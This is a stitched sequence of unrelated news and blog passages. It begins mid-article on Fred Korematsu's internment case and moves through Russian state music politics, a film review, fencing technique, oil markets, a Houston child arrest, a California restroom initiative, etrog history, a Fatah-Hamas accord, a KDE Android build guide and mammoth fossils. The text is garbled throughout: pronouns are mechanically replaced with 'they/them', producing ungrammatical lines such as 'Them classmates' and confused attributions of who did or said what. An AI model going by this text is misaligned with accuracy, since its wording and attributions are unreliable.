But most did not. “Korematsu was not excluded from the Military Area because of hostility to them or their race,” the court ruled. “The military urgency of the situation demanded that all citizens of Japanese ancestry be segregated from the West Coast temporarily.”
Korematsu learned he'd lost by letter, before being allowed to return to California. “He was disappointed and disgusted,” said Karen Korematsu.
So much so that for the first 16 years of their life, their father never told them who they are.
A poster went up in Karen's junior high school every anniversary of Pearl Harbor. Them classmates, they remembered, would take the opportunity to tell them to go back to Japan.
The idea seemed strange to them Them mother wasn't even Japanese, and their father had never set foot in the country.
In fact, they said, the Asian community in the Bay area seemed to hold their father in low opinion.
[75 years ago, what if Japan never attacked Pearl Harbor?]
One day at school, a classmate gave a book report about Japanese American internment during the war.
“I said, ‘That's interesting. I'd never heard about that before,'” Karen Korematsu said.
Them classmate went on — about “this one man that resisted and disobeyed and it ended up to be a landmark Supreme Court case.”
Karen heard their father's name, but figured it unlikely. They were a low-paid draftsman, known as a pushover at the office, hardly a legal icon.
When their father came home from work that evening, Karen asked them about it.
“He said, simply, it happened a long time ago,” they said. “And what they did, they felt was right. And the government was wrong.”
The pain in their father's face told them not to ask again.
And then years later, when they were grown, Karen Korematsu came home one day in 1982 to find their father sitting in their living room with a lawyer named Peter Irons and a stack of old papers.
Irons, who was also a political scientist at the University of California at San Diego, had come across the documents while researching a book.
In mislabeled boxes belonging to the Justice Department, they had discovered memos never seen during Korematsu's Supreme Court trial.
In one, the general who ordered the internments wrote how the “racial characteristics” of Japanese people made them inherently less loyal.
In another, a naval intelligence officer estimated that fewer than 3 percent of the Japanese population might be saboteurs.
“I thought, ‘My God, there's probably a lawsuit here,'” Irons recalled.
So they rounded up three Japanese Americans who had fought their internments at the Supreme Court. The first two were eager for a rematch. And hard as he'd been to track down, Korematsu was game, too.
[Google Doodle honors Fred Korematsu, who fought president's executive order on Japanese internment]
“My father never gave up hope that some day they could reopen their case,” Karen Korematsu said. “He carried that burden all those years.”
As the case proceeded, more about the Japanese internment program was being revealed to the country. A document declassified since World War II contained an admission that the program was designed in part to appease “public morale,” The Washington Post has previously reported.
A congressional panel ruled in 1983 that “race prejudice, war hysteria and the failure of political leadership” prompted the detentions.
Korematsu's had missed the end of their Supreme Court case in 1944, having been interned along with other Japanese Americans from the coast. But as a federal judge read out their decision in November 1983, Korematsu sat in a packed courtroom.
Irons sat beside him. Men and women who had been imprisoned like Korematsu sat all around.
By then, not even the government would defend Korematsu's conviction.
“Apparently the government would like this court to set aside the conviction without looking at the record in an effort to put this unfortunate episode in our country's history behind us,” U.S. District Judge Marilyn Hall Patel wrote in their decision.
They refused. Without ruling on the merit of Irons's documents, they told the courtroom the government's position was “tantamount to a confession of error.”
“There was a complete silence for several seconds as people took this in,” Irons recalled. “Then people erupted, cheering, clapping, crying.”
They rushed up to hug Korematsu — at age 63, a pariah and convict no more.
[Katy Perry's chilling PSA against creating a database of Muslims in the country]
In the remaining years of their life, until their death at age 86, Korematsu would hear apologies from U.S. presidents. They would receive the Presidential Medal of Freedom from Bill Clinton. They would be not so quiet — sometimes even making a speech. And their name would sometimes be invoked when someone felt the government was again casting blanket suspicion on innocent people.
“The extreme nature of the government's position is all-too-familiar,” reads Korematsu's 2003 brief to the Supreme Court, arguing against the imprisonment without trial of people at Guantanamo Bay, Cuba. The court would later restore rights to the prisoners.
But with these victories, Karen Korematsu said, come new threats.
They hear echoes of their father's old warnings in the way Trump's order casts suspicion on an entire class of people, and the way its defenders in court make claim to national security without citing any evidence against the people the order affects.
 They are reminded that during the campaign, Trump promised a broader ban on Muslim foreigners — as well as a registry of Muslims living in the United States.
 They are reminded that one of their top backers cited their father's case — which has never been overturned despite their exoneration — as legal precedent for such things.
“The Supreme Court case still stands,” Karen Korematsu said. “It's been discredited, but this was always my father's greatest fear.”
(Library of Congress)
Read more:
Justice Scalia on Kelo and Korematsu
Before people start invoking Japanese American internment, they should remember what it was like
A group of popular singers and producers in Russia has appealed to President Vladimir Putin to stop an ownership struggle that could turn a major radio company into a state-owned patriotic music holding.
In a letter quoted by the Kommersant newspaper, music industry heavyweights asked Putin to stop a deal by the state company Goskontsert to buy Russkaya Media Group, arguing it could make it impossible for “most representatives of the music industry” to work with the group's radio stations and television channels. Russkaya Media Group owns several well-known radio stations including Russkoye Radio, Hit FM, Maximum and Monte Carlo, as well as the television channel RU.TV.
Producer Vladimir Kiselyov, a business partner of Goskontsert's director, has reportedly been conducting negotiations to buy Russkaya Media Group for several months. An acquaintance of Putin from St Petersburg, Kiselyov previously was involved in organising a controversial 2010 event, allegedly for charity, at which Putin sang Fats Domino's Blueberry Hill for a star-studded audience including Gérard Depardieu, Kevin Costner and Monica Belluci.
In October, Kiselyov and Olga Plaksina, chairperson of the board of directors of Russkaya Media Group, wrote a letter to Putin suggesting Goskontsert head a project to develop “ideologically correct” pop idols, with the goal of ensuring popular support for Russia's leadership, Vedomosti newspaper reported this week.
Although the Kremlin controls all of Russia's major news channels, it previously has not made overt attempts to do the same with the music industry. But the patriotic pop star project has apparently been going ahead. At the end of June, IFD Kapital, which owns 78% of Russkaya Media Group, announced it would sell the company, which was reportedly valued at more than $100m, to Goskontsert. Russkaya Media Group director Sergei Kozhevnikov, who owns 22% of the company, is examining legal methods to prevent the deal.
In July, deputy communications minister Alexei Volin told telecom and television operators about a “music holding with a patriotic direction” and asked them to carry several newly established patriotic music channels, according meeting documents.
Kiselyov told Kommersant that they wanted to “sort out” Russian radio, arguing that four of Russkaya Media Group's stations play predominantly Western music. “We want them to play Russian artists,” they said.
But the letter signers argued that the Russian music industry was already patriotic enough, and singer Grigory Leps noted that the media group's flagship Russkoye Radio had been founded as a station that would play only Russian-language songs. Popular singers have frequently performed at patriotic events, and several have played in annexed Crimea and in areas of eastern Ukraine controlled by Russia-backed rebels, despite the threat of sanctions, Kozhevnikov told Kommersant. “Can you really call them unpatriotic?” they asked.
Notably, many of those who signed the letter have spoken in support of Kremlin policy, such as opera soprano Anna Netrebko, who posed for a photograph late last year with a leader of the separatist movement in eastern Ukraine, holding a rebel flag.
Opera singer Anna Netrebko poses with Ukrainian separatist flag Read more
Leps, who was blacklisted by the United States for suspected mafia ties, has appeared at numerous events in support of Putin. The letter was also signed by the “Russian Sinatra” Iosif Kobzon, a ruling party MP who was sanctioned by the European Union after they performed for rebels in Donetsk.
Putin's name was being used to intimidate Russkaya Media Group's owners into selling, the letter said. “The potential buyers are attempting to seize the holding with the help of slander and administrative pressure on the shareholders and management of RMG,” it said.
Putin's spokesperson said the president could not make any decisions related to such a deal.
According to the most recent records available, Goskontsert reported millions of roubles in losses in 2013. Music industry insiders quoted by Vedomosti said state bank VTB and the finance ministry were considering funding its purchase of Russkaya Media Group.
“…will surely make you squirm from either the violently-harsh torture scenes or the dramatically-intense story line.”
Some movies are simply not for the faint-of-heart, and today, I felt like dredging up the past and throwing back to a classic, South Korean film that will surely make you squirm from either the violently-harsh torture scenes or the dramatically-intense story line. Oldboy (directed by Park Chan-wook, 2003) is a mystery wrapped inside a veil of dark humor and revenge. Just when you think you know where this one is headed, the story takes a surprising turn that will leave you wondering until the climactic unveiling is reached. This is one of those foreign films that even people who despise reading English subtitles will get so absorbed in the story that they will completely forget the characters are speaking Korean.
This intriguing and creepy tale begins by introducing us to our troubled protagonist, Oh Dae-Su (played by Min-sik Choi). On the day of their daughter's birthday, when they should have been at home, Dae-Su is being held at a police station, comically drunk and causing nothing but trouble. Unfortunately for Dae-Su, they don't make it home to celebrate with their wife and child. Instead, they are captured and taken prisoner for 15 excruciatingly-dull years. While they aren't tortured physically, the question of whom and why they are being held captive eats away at them and fuels a desperate curiosity that keeps them going. Instead of shutting down, Dae-Su becomes strong, and the former, shell-of-a-man is cracked wide-open upon their release. Despite their vow not to trust anyone if they ever escaped, Dae-Su makes a connection with a beautiful sushi chef named Mi-do (played by Hye-jeong Kang). Compelled to find answers yet uncertain of everyone, Dae-Su races against their captor's deadline to discover the motive behind stealing 15 precious years of their life away from him.
With much of this movie dominated by one man, Min-sik Choi absolutely delivers a compelling performance as Dae-Su. On a journey from bum to badass, Dae-Su has to lose their mind before they can become strong enough to find and face their demons. There are even moments where their crazed laughter is maniacal enough to send shivers down any spine, both man and beast included. Ji-tae Yu also delivers a chilling performance as the man Dae-Su discovers is behind their twisted punishment. As the story unravels over the course of two, nail-biting hours, we are fed tiny morsels of information that nudges the story along. For as long as this film is, the jaw-dropping discoveries and strange situations will latch on and keep you guessing.
Oldboy is both artistic and thrilling, and I was impressed with how well Dae-Su's voiceover commentary describes 15 years of solitary confinement and the emotional toll it takes. Despite the deeply disturbing events, the film maintains a whimsical and airy sense-of-humor that helps to lighten the overall mood. It isn't often that a gloomy thriller can also be described as comical, but Oldboy delivers completely. This one gets a 9/10 and the honorary title of a classic in my book. After racking up film festival awards in the double digits, it's hard to argue that this film is anything other than groundbreaking.
In the second device we looked at the parry against a rising attack on the left, today we look at the rising cut on the right.
Initial Parry: Krump
No real change here. The attack is against your right, so you step away from it to your opponent's right while parrying with the long edge against theirs forte.
First Counter-Attack: Short to the Left Ear
This is where things get really interesting. Rather that attacking to the other side, Meyer once again tells us to use a short-edge cut to the left ear. This sounds like a typo at first, but Meyer specifically says that your sword will be beside or above theirs sword.
Meyer says that in doing this short-edge cut you push the pommel under your arm. This means that the cut must be with crossed arms, which again puts us in an Ochs-like position.
The Parry and Second Attack
Given where their sword is, the only parry the opponent has is a to push your sword to the right. That's cool. Just let it run off along their right (your left) side, step well to their left side, and hit them with the long edge on the top of the head.
This illustration is close, but the right foot should be forward.
Zwerch to the Left Ear
Finally we get to use the trademark German Zwerch to the left ear. This is done with “a backstep on your left foot”. Not sure exactly what that means, given the right foot was forward, but the basic gist of it is that you've started your withdrawal with one last wounding attack.
Immediately after the Zwerch cut away as you see fit.
Advertisements
West Texas Intermediate crude oil is at a 6-year low of $US43 a barrel.
And back in December 2014, “Bond King” Jeff Gundlach had a serious warning for the world if oil prices got to $US40 a barrel.
“I hope it does not go to $US40,” Gundlach said in a presentation, “because then something is very, very wrong with the world, not just the economy. The geopolitical consequences could be — to put it bluntly — terrifying.”
Gundlach added that, “If oil falls to around $US40 a barrel then I think the yield on ten year Treasury note is going to 1%.”
The 10-year note was trading at 2.14% on Tuesday.
On December 9, 2014, WTI was trading near $US65 a barrel and Gundlach said oil looked like it was going lower, quipping that oil would find a bottom when it starts going up.
WTI eventually bottomed at $US43 in mid-March and spend most all of the spring and early summer trading near $US60.
On Tuesday, WTI hit a fresh 6-year low, plunging more than 4% and trading below $US43 a barrel.
In the last month, crude and the entire commodity complex have rolled over again as the market battles oversupply and a Chinese economy that slowing.
And all this as the Federal Reserve makes noise about raising interest rates, having some in the market asking if these external factors — what the Fed would call “exogenous” factors — will stop the Fed from changing its interest rate policy for the first time in over almost 7 years.
In an afternoon email, Russ Certo, a rate strategist at Brean Capital, highlighted Gundlach's comments and said that the linkages between the run-up, and now collapse, in commodity prices since the financial crisis have made, quite simply, for an extremely complex market environment right now.
“There is a global de-leveraging occurring in front of our eyes,” Certo wrote. “And, I suppose, the smart folks will determine the exact causes and translate what that means for FUTURE investment thesis. Today it may not matter other than accurately anticipating a myriad of global price movements in relation to each other.”
Business Insider Emails & Alerts Site highlights each day to your inbox. Email Address Join
Follow Business Insider Australia on Facebook, Twitter, LinkedIn, and Instagram.
Akdong Musician's Lee Soo Hyun and JBJ's Kwon Hyun Bin will be starring in SBS's upcoming drama “Part-Time Idol” (literal title).
The storyline takes place at an entertainment agency. After creating a bunch of famous idols, a producer begins to question the whole process of making a star, so they go on a break for a few years. Once they return to the company, they gather some trainees left on the back burner and tries to launch a co-ed idol group. The trainees undergo some peculiar training to debut in this group.
YGKPLUS and SBS's mobile contents brand Mobidic will be co-producing the drama. Actresses Kim Hee Jung and Hwang Seung Eon will also be joining the cast.
Kim Hee Jung's character is a trainee who's highly skilled in rap and dance, but they develop a short-tempered personality after their debut plans repeatedly fall through. Hwang Seung Eon's character, on the other hand, has a bright personality, but they consider giving up on their dreams due to stage fright.
Kwon Hyun Bin will be playing a cute yet overconfident trainee, and Lee Soo Hyun will be playing a character who had already debuted as a singer but is now trying to stand alone without their brother. Due to this stress, however, they begin to struggle with some vocal problems.
“Part-Time Idol” will be 10 episodes long, with each episode being approximately 15 minutes. It will first premiere online mid-November, but they are hoping to air it on television as well. Filming will begin at the end of September.
Source (1)
US police arrested a 10 year old girl after a neighbour witnessed inappropriate touching during a game of doctors. Courtesy KRIV FOX Twenty Six
A 10-YEAR-OLD d girl is facing charges of aggravated sexual assault after allegedly raping a 4-year old boy during a game of "doctor".
The girl, identified only as "Ashley", was playing with a group of children from their housing complex in April when a neighbour reported an incident to the mother of the 4-year-old, KRIV-TV reports. Ashley was reportedly inappropriately touching the child.
"I was at the track with my friend cuz I like running track with my friend and then my Mom called my friend and they told me that my Mom said I had to come home," they said.
"I was crying and they took me to the car and I didn't want to get in and I was crying and I was moving and trying not to get in the police car and my Mom told me to calm down," they said.
Two months later Ashley was arrested and charged. They spent four days in the Harris County Juvenile Detention Centre.
"When my Mom came to see me I said I wanted to go home and then they said I couldn't go home and they were like I know you want to go home," they said.
According to Ashley's mum, the Houston Police sex crimes investigator denied them the right to sit in on a 45-minute interrogation that left their daughter in tears.
"It's a nightmare even having to go through something like this because that's my baby, that's my baby and just the thought of them going through something like this it hurts me," said mum.
Houston Police are not commenting on the case due to the Ashley's age.
Ashley will face court in October on sexual assault charges.
"I've never dealt with a child this young being accused of a crime," said Quanell X, who is working with Ashley's family.
"In fact this was nothing more than inappropriate horseplay that has now leaded to a child that is ten years old being charged with aggravated rape."
Restroom (Shutterstock)
An initiative proposed by a religious conservative group Friday in California would ban transgender people from using single-sex facilities in government buildings that correspond with their gender identity, Buzzfeed News reports.
The proposed law requires people to use facilities such as restrooms, showers, dressing rooms, and locker rooms in all government buildings “in accordance with their biological sex,” effectively banning transgender people to use these facilities that correspond to their gender. A “violation” could result in a penalty of at least $4,000.
Although the ban only applies to facilities in government buildings, including public schools and universities, the proposed law would protect private businesses from litigations if they enforce similar bans.
The initiative, titled “Personal Privacy Protection Act,” claims that the ban is proposed to “preserve fundamental interests in privacy,” and “maintain public safety.” However, Buzzfeed's Dominic Holden calls it a “backlash against recent and significant gains by the LGBT-rights movement.”
There has been pushback from LGBT rights advocates. ACLU's Kris Hayashi, the Executive Director at Transgender Law Center, calls it “bathroom police.”
“Anyone who doesn't meet stereotypes of what a woman looks like or what a man looks like – or really anyone a building manager or someone else with power wanted to harass – could be singled out to somehow ‘prove' their gender before using the bathroom,” Hayashi writes on the ACLU website, and rather than protecting privacy, it is “an attack” on it.
The proposed law would also conflict with the federal interpretation of Title IX, which bans gender discrimination.
The initiative is sponsored by Privacy For All, a campaign organized by religious conservatives, who failed to repeal a 2013 law that allowed students to use school facilities that reflected their gender.
For the new initiative to appear on the fall 2016 ballot, its proponents must gather 365,880 valid signatures from California voters.
California isn't the only state that has seen such an initiative. Similar bills have been proposed in Florida and Texas this year. Recently, the transgender issue has been used by anti-LGBTQ groups to repeal a gender nondiscrimination law in Missouri.
Zev Eleff
In 1866, etrog merchants failed to deliver citrons on time to thousands of Jews in the United States. From New York to Texas, Louisiana to Kansas, “congregations were sadly disappointed,” opined one Jewish newspaperman at the time, “but not more so than the unfortunate importers, who, on the arrival of the steamer, received some splendid Corfu Esrogim, but, alas too late!”
The disappointment shared in the unhappy report indicates that many Jews in this so-called Treifene Medine had wished to observe the laws of Sukkot. Their plans, though, were stymied by the too-much-delayed delivery of the Greek etrogim. In fact, Jews in the United States had a long tradition—one that began with Shearith Israel in New York—of fundraising before Sukkot to ensure that anyone who wished could acquire the religious equipment to perform the holiday rituals.
Of course, America was not exactly the “Goldene Medine” either. By the 1870s, the etrog market was in steep decline. Mitzvah merchants—a terrific term coined by historian Annie Polland—like Hyman Sakolski continued to sell etrogim along with sacred books on Manhattan's Division Street. However, Sakolski made it clear that etrogim were no longer a profitable item. They sold them to ensure that the dwindling number of interested Jews could observe the holiday. Peddlers and shopkeepers no longer bothered to make the necessary international arrangements to import the sacred goods. Accordingly, the number of newspaper circulars advertising etrogim for purchase speedily decreased. One Jew from Cincinnati summed up the sentiments of their coreligionists this way:
If you have no Esrog, no Lulav, etc., oranges, grapes, pears, and apples will do, not to be shaken, but to be gratefully enjoyed as God's blessing bestowed upon our beautiful land. Instead of shaking, send a nice basket of choice fruit to some poor family or families, and you have done quite well. Be glad, be blessed.
Overall, religious observance among America's Jews was at a nadir. It wasn't that most observant Jews had migrated toward Reform and abandoned traditional rituals. Usually, it was the case in the post-Civil War period that young Jews no longer looked to any form of Judaism. Sukkot, therefore, suffered along with Shabbat and other Jewish holidays. In September 1876, one Lower East Side merchant claimed with some exaggeration that they were the lone provider of etrogim left to Jews in the United States.
Then, something happened. In 1887, Rabbi Moshe Weinberger of New York reported that the “number of merchants selling etrogim” had “increased greatly in recent years, and the competition is now exceedingly great.” Here are Rabbi Weinberger's observations found in their Ha-Yehudim ve-Yahadut bi-New York, translated into English many years ago by my teacher, Jonathan Sarna:
This has brought with it a certain amount of good. In New York, any Jew can now easily observe these mitzvot in the strictest possible fashion, without worrying about spending more than they can afford. Only a few years ago, a poor man in New York could not buy a lulav and etrog of their own; even the most highly Orthodox had to observe the commandments with etrogim circulated around every morning by poor peddlers. Now it is hard to find any kosher traditional home without an etrog of its own. In many synagogues, especially the small ones, there are as many etrogim as worshippers.
What had happened? For one thing, the Jewish population in the United States increased due to mass migration from Eastern Europe. In 1880, there were a quarter-million Jews living on American soil. By the turn of the century, that figure was closer to a million. The rise in interest in etrogim also had something to do with their new place of origin. For instance, the newspapers announced that Mr. J.H. Kantrowitz of 31 East Broadway had “imported from the Holy Land a choice lot of Esrogim. This is the first time that Esrogim grown in the Holy Land have been sold in this city, and Mr. Kantrowitz's enterprise deserves liberal patronage.” Mr. Kantrowitz did quite well for himself, convincing others to arrange for etrog shipments from Eretz Yisrael, as well. In short order, American Jewry experienced a great spike in etrog sales—and, accordingly, etrog observance.
There is no requirement to use an etrog from Eretz Yisrael. Yet, the connection between observance and the Holy Land triggered something powerful. Jews started to take a greater interest in the fruitful holiday of Sukkot. No doubt, they were moved by the news of the pioneering efforts to rebuild and replant the Holy Land. To them, support of etrog importation meant support for the Yishuv.
Mitzvah merchants still peddled some Corfu etrogim. However, Holy Land etrogim emerged as the citron of choice. Orthodox Jews in the United States, for example, were happy to learn in 1881 that the “Agricultural School of Jaffa produces excellent white wine, and this year a small number of Esrogim were among its products.” Decades later, America's Jews also started to purchase imported etrogim from Petah-Tikva. The lesson learned here is that religious observance can—and oftentimes is—inspired by ancillary, if not altogether righteous causes. In the case of etrogim, Zionism was this great cause.
Among the Orthodox, Zionism was not a controversial item. In June 1898, the founders of the Orthodox Union spent hours deliberating whether to call their new organization “Orthodox,” debating the pros and cons of such a nomenclature. However, the other plank decided at that inaugural meeting, on Zionism, required just minimal conversation and reached an overwhelming consensus in very short order. Likewise, the Agudath Ha-Rabbonim, established in 1902, was composed of much more religiously “rightwing” members compared to the Orthodox Union leadership. Yet, the Agudath Ha-Rabbonim agreed wholeheartedly with its Union counterparts.
The renewed prominence of the etrog in American Jewish life piqued the strange curiosity of Christian neighbors. In 1916, the editors of the Country Gentleman, the journal of record for the “farm, the garden and the fireside” in Philadelphia, told their readers about the “sacred Jewish citron” and the high prices paid for it by “Orthodox Hebrews.” The magazine noted that while most are imported from Palestine to the United States, to the delight of agricultural opportunists that, owing to the ongoing Great War, “it is possible that the etrog might be profitably grown on a small scale in some of the citrus sections of Florida and California.”
The plan did not work, but some still try. As of 2011, there was one 80-year-old etrog farmer who raises etrogim not too far from Sacramento. Aside from that, etrog yields from American soil are sparse if not non-existent. For more than a hundred years, Jewish bookstores and pop-up merchants in storefronts and residential basements urge their customers to purchase the slightly pricier Israeli etrog to support farmers in the Holy Land. Dutifully raised in a Religious Zionist home, I usually comply. It isn't that Californian or Floridian etrogim would be any less kosher. However, there is much to be said for the ever-increasing extra layers of meaning of the mitzvot we observe.
Some serious allegations are being lobbed at the Rockets' James Harden. (AP Photo/Carlos Osorio)
Moses Malone Jr., the son of the late NBA legend, was robbed of $15,000 worth of jewelry by five men early Saturday morning outside a Houston after-hours club, and they say it's all because Houston Rockets star James Harden was mad at him.
It all began, in Malone's eyes, when they criticized Harden on Facebook for charging so much for their youth basketball camp. Kaitlin McCulley of KTRK-TV in Houston has the screengrab.
Moses Malone Jr. (son of bball legend) told me James Harden's "people" robbed them b/c they posted this @JHarden13 pic.twitter.com/8hZmVPr2ai — Kaitlin McCulley (@KaitlinMcCulley) June 28, 2016
In response, Malone told McCulley, Harden sent their entourage to find them at V Live Houston to beat them up and rob them of jewelry. A Houston police spokesperson told McCulley that at least four of the men had guns. Malone's attorney added that club security guards were complicit in the attack, a charge denied by a V Live representative who told Isiah Carey of Fox 26 in Houston that the guards in fact helped break up the attack.
“I don't believe Mr. Harden was at the club, and I definitely don't believe they had anything to do with an attack on Mr. Malone,” V Live's Carl A. Moore said. “And so the club's position is that Mr. Malone is a regular of the club. We would have done everything we could to make sure they were safe.”
Indeed, V Live's NSFW Instagram has a video showing someone identified as Malone making it rain in the nightspot, which despite all outward appearances is “not technically a strip club,” according to the Houston Chronicle, but rather an after-hours hot spot for athletes and celebrities that maintains the rather odd operating hours of 2 a.m. to 6 a.m., Tuesday through Sunday.
Houston police are still investigating the incident, McCulley reports, and no charges have been filed.
The 42-year-old has been signed up by LD Motorsport for the Sandown 500, grabbing the one-race vacancy alongside Nick Percat created thanks to Oliver Gavin's World Endurance Championship clash.
While McConville has some recent miles in a Supercar thanks to practice laps at Winton and Queensland Raceway with LDM, the Sandown 500 will be their first actual Supercars race since 2012.
Despite the near-four-year gap between races, McConville says he's done enough racing in other categories to keep their general race fitness up.
“Even though I haven't driven in a Supercar event since Bathurst 2012, I have been doing some GT and Carrera Cup racing so have kept relatively race sharp,” said McConville.
“The recent co-driver session gave me a good feel of the car and to be honest it felt like yesterday that I was racing around Queensland Raceway.
“It's certainly no full-time come back or anything like that, but the opportunity to help the team out with the absence of Oliver Gavin was too good to pass up.
“I have a lot of time for [team owner] Lucas [Dumbrell] and the whole team and what they are trying to achieve, so I'm super keen to help them get a result for Sandown.”
Gavin will return to the team to partner Percat in the #222 Commodore for the Bathurst and Gold Coast races.
“Unfortunately, Oliver had prior commitments with their team, Corvette Racing in the US, and we had to look for another driver to step in for the first round,” said Dumbrell.
“Cam has been with us before, they did a great job in both of the additional driver sessions and obviously has a vast experience in racing.”
McConville has subbed for LD Motorsport once before, stepping in to replace Daniel Gaunt at Townsville in 2010.
A German man tried to rob a Frankfurt bank on Monday, but after admitting to the bank teller they wanted to be arrested to get help for their drug addiction, they got them a cup of coffee and police let them go.
The 44-year-old man was instead given advice on where to seek help for their addiction, The Local reported.
The man walked into the bank Monday morning, waited in line, then told a teller they were robbing the bank.
After hitting the alarm to call police, the teller started talking to the man and they admitted they didn't actually want the money, but needed help. They offered them a chair and a cup of coffee and sat with them while they waited for police.
"He didn't hurt anyone, didn't damage anything, so there was no reason for us to hold him," a police spokesperson told the website.
This might be old news for more seasoned Emacs users, but as I have been using it for only a bit more than a decade, I feel like a, say, intermediate user.
So, basically, some time ago I had a kind of revelation and I understood what Emacs really is. Many people think it's a text editor; that's not 100% true. There's also a joke that it is an operating system; this has some grain of truth in it, but it's also not the whole story.
What is Emacs, then? It is a DIY kit for building Your Personal Text Editor™. It comes with a default one, which is decent (but not phenomenal, unless you tweak it a bit/a lot, depending on your preferences), but it's neither the only, nor necessarily the best one (there exists one other really good – maybe even better – editor, which we shall not name here). The real power of Emacs is that you can build your custom editor on top of it. And this is going to be the awesomest one, because, you know, it is the only one really suited to your needs.
Pretty obvious, I know. But I guess it's important that you get that when you make the decision about which editor to choose, so maybe someone will find this post useful.
CategoryBlog, CategoryEnglish, CategoryEmacs
The Yellowstone County News has been publishing a weekly newspaper since 1976.
We primarily serve the Yellowstone County, Montana area (Lockwood, Huntley Project, Billings, Shepherd and surrounding areas,).
We publish weekly news covering the Yellowstone County Commissioners and county news along with our school districts and local district monthly meetings. We do have some state and national news in our paper but our main focus covers weekly, Hyper-local news with the local views in Yellowstone County.
Check out our weekly classifieds section that is published each week in the paper as well as uploaded online.
If you'd like to learn more about us, check out our masthead, and if you need to reach us, use the contact page or check out our advertising options for you.
Give us a call at 406-348-2650 if you have any questions.
Yellowstone County News
Weekly News, Local Views!
add more info here
GAZA (Reuters) - Rival Palestinian factions Fatah and Hamas agreed on the make-up of a national unity government on Tuesday in the most significant step yet toward healing their seven-year rift.
The two groups said they had decided on a list of independent, technocrat ministers who will run the government pending elections in at least six months - moves they hope will revive institutions paralysed since the parties fought a brief civil war in 2007.
Officials from the two sides told a news conference in the Gaza Strip that Palestinian President Mahmoud Abbas will make a formal announcement of the new government later this week after choosing a religious affairs minister.
“The viewpoints of the Hamas and Fatah movements will be presented to President (Abbas) to give their final decision on the government line-up,” Fatah official Azzam al-Ahmed said.
The deal cements an initial unity pledge the two parties announced on April 23, just as U.S.-backed peace talks Abbas was holding with Israel were collapsing.
Those negotiations now appear to be totally stalled, yet both Abbas and their Israeli counterparts say they seek more talks under the right conditions.
Israel objects to the reconciliation moves and regards Hamas, which refuses to recognise it or renounce arms, as a terrorist group.
FIGHTING OR NEGOTIATION?
The two factions agreed that current Prime Minister Rami Al-Hamdallah, a former university president picked by Abbas, will lead the new cabinet. Sources close to the unity talks said Hamdallah would also assume the sensitive post of interior minister, and that the current ministers of foreign affairs and finance will stay on.
They said a formal swearing-in ceremony will be held later in the week at Abbas's seat of government in Ramallah. Abbas has sought to soothe foreign donor countries upon which their government depends for its economic survival that they will remain the main Palestinian decision-maker on diplomacy and policy toward Israel.
Deep mistrust have scuppered previous deals to end the internal Palestinian rift, with both sides struggling to reconcile Hamas's commitment to fighting Israel with Abbas's choice to negotiate with it.
Ismail Haniyeh, current prime minister of the Hamas government in Gaza, said at a rally earlier on Tuesday that Palestinians would now be newly empowered to fight Israel.
“Palestinian reconciliation aims to unite the Palestinian people against the prime enemy, the Zionist enemy. It aims to pursue the choice of resistance and steadfastness,” Haniyeh told supporters in the southern town of Rafah.
Sources close to the talks say reconciling the Hamas-built security services in Gaza with Abbas's Western-equipped security forces in the West Bank will be delayed until after elections.
Leaders of the group said their most powerful armed wing will remain untouched even after the vote.
Despite my involvement in KDE and free software operating systems, one of the features I've always loved from Qt is how we can use it to develop an application that can be used on any platform. Since I got my first /programmable/ phone, I've wanted to get my projects to work there, especially through all Nokia approaches to the issue, and I've managed to do so with relative success.
At some point last year I got to the conclusion that, if I wanted to remain somewhat sane, the best approach was to start focusing Android by caring about the CMake side of the issue and let QtQuick get into place, which is not in place yet, but admittedly in a much better state than a couple of years ago.
My KDE on Android approach is that any KDE project should be able to be built and bundled for Android from the sources, that is with an apk file as a result, without having to change the project sources: c++ or cmake.
I started working on this longtime ago on Qt4, but the fact that kdelibs was about to change and the poor direction of the port drove me away from bothering. Also if we want portable interfaces we want QtQuick Controls. I don't think there's much doubt there.
I restarted the project last November. I compiled a full Qt5 installation and started to get it to build, my intention was to use android.toolchain.cmake again, but I then decided that it would be better to create a new cmake toolchain file to have all the control I needed over how it's being compiled. Some things need to be treated with special love like how executables are built and especially being able to create apks.
At the moment it seems to be working reasonably well, I've been using KAlgebra as a test. I get to easily deploy the Analitza framework which is a dependency and then consume it from KAlgebra which bundles all dependencies into a nice publishable APK.
Enough back-story, let's see how we'd build KAlgebra (or any traditional KDE project for that matter).
To get all the features going we need:
* Qt 5.4 built for Android (currently in dev branch)
* CMake 3.0
* Android NDK
* Android Development Kit
* the ToolChain file I created (still to find a proper place, can be found here)
* Extra-CMake-Modules
* The project's source code, because the power is in the source!
Here's an example on how to get it done [1], but that's the expanded version. As an attempt not to scare you here I used a simplified version, by having a cmakeandroid macro defined, passing cmake all the needed information.
mkdir build-analitza build-kalgebra
cd build-analitza && cmakeandroid ~/src/analitza && make && make install
cd build-kalgebra && cmakeandroid ~/src/kalgebra -DQTANDROID_EXPORTED_TARGET=kalgebramobile && make && make create-apk-kalgebramobile
Which I think it's readable enough.
To conclude, we are able to consider Android as a candidate for KDE projects to adopt. There's much more to do both on KDE, Qt and cmake sides, but we can get to discuss it when you've ported your application.
For the moment, I'd like to know if there's any application that is interested in being built for Android, I'd like to give it a try, especially if it's already been ported to QtQuick and Qt5/KF5.
Furthermore, in case anybody is interested, I'll open a wiki page with this information, in case anybody wants to use it, for the moment my cmake toolchain and manifest can be found here:
http://quickgit.kde.org/?p=scratch%2Fapol%2Fkalgebraandroid.git
The last of the woolly mammoths may have suffered from high rates of devastating birth defects, new research suggests.
Fossils of mammoths found near the North Sea and dating to the late Pleistocene, about 12,000 years ago, frequently sported extra ribs along their neck vertebrae. Though harmless on their own, these cervical ribs are often signs of development gone awry. A 2006 study of extra cervical ribs in humans published in the journal Evolution found that about 78 percent of fetuses with cervical ribs die before birth; 86 percent of fetuses that develop with these extra ribs won't make it to their first birthday.
The mammoth rib study began with the discovery of three neck vertebrae in the North Sea during a construction project in the Rotterdam Harbor. Two out of the three vertebrae showed signs that ribs had once been attached: smooth surfaces where bones once joined and a lack of normal openings for blood vessels and nerves. [Image Gallery: Stunning Mammoth Bones Unearthed]
This is author Dr. Jelle Reumer holding one of the cervical vertebrae and indicating the location of the cervical rib.
"We knew these were just about the last mammoths living there, so we suspected something was happening. Our work now shows that there was indeed a problem in this population," study researcher Jelle Reumer, a paleontologist at the Natural History Museum of Rotterdam and Utrecht University, said in a statement.
Reumer and their colleagues scoured the collections of the Natural History Museum of Rotterdam and the Naturalis Biodiversity Center in Leiden, Netherlands. They found 16 neck vertebrae from mammoths (Mammuthus primigenius) and were able to analyze nine of them. Of those nine, three had once been attached to cervical ribs, they found.
